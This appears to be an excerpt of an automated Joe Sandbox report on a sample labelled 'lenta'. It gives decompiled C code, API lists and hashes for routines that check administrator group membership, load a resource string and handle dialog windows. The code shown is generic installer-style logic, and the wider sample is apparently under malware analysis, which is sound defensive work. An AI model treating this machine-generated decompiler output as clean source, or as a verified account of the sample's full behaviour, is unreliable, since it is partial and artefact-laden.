                                                                                                                                                                                                                                            0x00a9312a
                                                                                                                                                                                                                                            0x00a93134
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93134
                                                                                                                                                                                                                                            0x00a9312c
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A9313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A9314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 00A9316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A93176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A9317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00A93185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00A93190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00A930C0), ref: 00A931A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A931CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                            • Opcode ID: f7e62517c0f203b1db1783790b9c3f190e73328708a383651fb0ee994f28018a
                                                                                                                                                                                                                                            • Instruction ID: 895e9458c4e315d07ccdcdb139f400635ec7b22de0ad2a2398bb7665531fe5a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7e62517c0f203b1db1783790b9c3f190e73328708a383651fb0ee994f28018a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B117F32348221BBDF119BA89C0CB9A3AF4FB5A721F204713F825951F0DF759A42C696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E00A918A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0xa98128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E00A96CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A917EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0xa98128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa98128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a918a3
                                                                                                                                                                                                                                            0x00a918a3
                                                                                                                                                                                                                                            0x00a918ab
                                                                                                                                                                                                                                            0x00a918b2
                                                                                                                                                                                                                                            0x00a918b5
                                                                                                                                                                                                                                            0x00a918be
                                                                                                                                                                                                                                            0x00a918c0
                                                                                                                                                                                                                                            0x00a918c6
                                                                                                                                                                                                                                            0x00a918c7
                                                                                                                                                                                                                                            0x00a918ca
                                                                                                                                                                                                                                            0x00a918cf
                                                                                                                                                                                                                                            0x00a919c9
                                                                                                                                                                                                                                            0x00a919d8
                                                                                                                                                                                                                                            0x00a919d8
                                                                                                                                                                                                                                            0x00a918df
                                                                                                                                                                                                                                            0x00a919b8
                                                                                                                                                                                                                                            0x00a919bd
                                                                                                                                                                                                                                            0x00a919bf
                                                                                                                                                                                                                                            0x00a919bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a919bd
                                                                                                                                                                                                                                            0x00a918fa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91912
                                                                                                                                                                                                                                            0x00a919aa
                                                                                                                                                                                                                                            0x00a919ad
                                                                                                                                                                                                                                            0x00a919b3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91927
                                                                                                                                                                                                                                            0x00a91927
                                                                                                                                                                                                                                            0x00a91932
                                                                                                                                                                                                                                            0x00a91936
                                                                                                                                                                                                                                            0x00a919a9
                                                                                                                                                                                                                                            0x00a919a9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a919a9
                                                                                                                                                                                                                                            0x00a9194c
                                                                                                                                                                                                                                            0x00a919a2
                                                                                                                                                                                                                                            0x00a919a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9196e
                                                                                                                                                                                                                                            0x00a91970
                                                                                                                                                                                                                                            0x00a91999
                                                                                                                                                                                                                                            0x00a9199c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9199c
                                                                                                                                                                                                                                            0x00a91972
                                                                                                                                                                                                                                            0x00a91972
                                                                                                                                                                                                                                            0x00a91975
                                                                                                                                                                                                                                            0x00a91984
                                                                                                                                                                                                                                            0x00a91985
                                                                                                                                                                                                                                            0x00a9198a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9198c
                                                                                                                                                                                                                                            0x00a91991
                                                                                                                                                                                                                                            0x00a91996
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91996
                                                                                                                                                                                                                                            0x00a9194c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A918DD), ref: 00A9181A
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A9182C
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: AllocateAndInitializeSid.ADVAPI32(00A918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A918DD), ref: 00A91855
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: FreeSid.ADVAPI32(?,?,?,?,00A918DD), ref: 00A91883
                                                                                                                                                                                                                                              • Part of subcall function 00A917EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A918DD), ref: 00A9188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A918EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A918F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A9190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00A91918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A9192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A91944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A91964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 00A9197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00A9199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A919A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A919AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: 38aa62599c6a1f8c65d8271dbeea4eed88ae99aac69008de578fc7cef5e29761
                                                                                                                                                                                                                                            • Instruction ID: f9b4b0c39964eebdc3d24acee4c3d5c2fe6d4e43f2001de64ff82bce7814fa2f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38aa62599c6a1f8c65d8271dbeea4eed88ae99aac69008de578fc7cef5e29761
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3311871B0020AABDF20DFE5DC98AAFBBF8FF15700F20042AE545D2160DB359906CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A9468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a94699
                                                                                                                                                                                                                                            0x00a9469b
                                                                                                                                                                                                                                            0x00a946a9
                                                                                                                                                                                                                                            0x00a946af
                                                                                                                                                                                                                                            0x00a946b4
                                                                                                                                                                                                                                            0x00a946bc
                                                                                                                                                                                                                                            0x00a946f9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a946f9
                                                                                                                                                                                                                                            0x00a946d9
                                                                                                                                                                                                                                            0x00a946dd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a946e5
                                                                                                                                                                                                                                            0x00a946ef
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a946f5
                                                                                                                                                                                                                                            0x00a946ff

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$lenta
                                                                                                                                                                                                                                            • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                            • Opcode ID: 96aca75a9b051fbf5405e3ab5f0298e9928cb0f6af38c1c9caeb0b7e5d8c884d
                                                                                                                                                                                                                                            • Instruction ID: 9d9cfc21d34befd617bc1e1335bd0b0addbfc6407c857c45ceb75964476b921e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96aca75a9b051fbf5405e3ab5f0298e9928cb0f6af38c1c9caeb0b7e5d8c884d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0601D1723402207BE7205BE56C4DF6B3E6CDBDAB62F140417FB4A86190CEA1884383E2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E00A917EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0xa9a288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a917f6
                                                                                                                                                                                                                                            0x00a917fd
                                                                                                                                                                                                                                            0x00a91805
                                                                                                                                                                                                                                            0x00a9180b
                                                                                                                                                                                                                                            0x00a9180d
                                                                                                                                                                                                                                            0x00a91815
                                                                                                                                                                                                                                            0x00a91818
                                                                                                                                                                                                                                            0x00a91820
                                                                                                                                                                                                                                            0x00a91824
                                                                                                                                                                                                                                            0x00a9182c
                                                                                                                                                                                                                                            0x00a91832
                                                                                                                                                                                                                                            0x00a91837
                                                                                                                                                                                                                                            0x00a91851
                                                                                                                                                                                                                                            0x00a91854
                                                                                                                                                                                                                                            0x00a9185d
                                                                                                                                                                                                                                            0x00a91862
                                                                                                                                                                                                                                            0x00a9186c
                                                                                                                                                                                                                                            0x00a91872
                                                                                                                                                                                                                                            0x00a91877
                                                                                                                                                                                                                                            0x00a9187e
                                                                                                                                                                                                                                            0x00a9187e
                                                                                                                                                                                                                                            0x00a91883
                                                                                                                                                                                                                                            0x00a91883
                                                                                                                                                                                                                                            0x00a9185d
                                                                                                                                                                                                                                            0x00a9188a
                                                                                                                                                                                                                                            0x00a9188a
                                                                                                                                                                                                                                            0x00a918a2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A918DD), ref: 00A9181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A9182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00A918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A918DD), ref: 00A91855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,00A918DD), ref: 00A91883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A918DD), ref: 00A9188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: 8ea42cda60d155b874b81d66151c63b751fbdd4e5be84dc0fc964270e75b6818
                                                                                                                                                                                                                                            • Instruction ID: d2ae7fa2e47dd2e96da184855b3e323dcec41bfc05ddf5d7bd32fdc92e6024eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ea42cda60d155b874b81d66151c63b751fbdd4e5be84dc0fc964270e75b6818
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5118131F00209ABDB10DFA4DC49ABEBBB8EF44701F10456BFA12E6290DE308D018B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A93450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E00A943D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0xa99404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa991dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a93459
                                                                                                                                                                                                                                            0x00a9345c
                                                                                                                                                                                                                                            0x00a934d8
                                                                                                                                                                                                                                            0x00a934de
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a934e0
                                                                                                                                                                                                                                            0x00a9345e
                                                                                                                                                                                                                                            0x00a93463
                                                                                                                                                                                                                                            0x00a9349a
                                                                                                                                                                                                                                            0x00a934a0
                                                                                                                                                                                                                                            0x00a934a7
                                                                                                                                                                                                                                            0x00a934b2
                                                                                                                                                                                                                                            0x00a934c4
                                                                                                                                                                                                                                            0x00a934cb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a934cb
                                                                                                                                                                                                                                            0x00a93468
                                                                                                                                                                                                                                            0x00a9346e
                                                                                                                                                                                                                                            0x00a93474
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9347c
                                                                                                                                                                                                                                            0x00a9348c
                                                                                                                                                                                                                                            0x00a93490
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93496
                                                                                                                                                                                                                                            0x00a93484
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93486
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93486
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A93490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A9349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A934B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 00A934C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A934CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 00A934D8
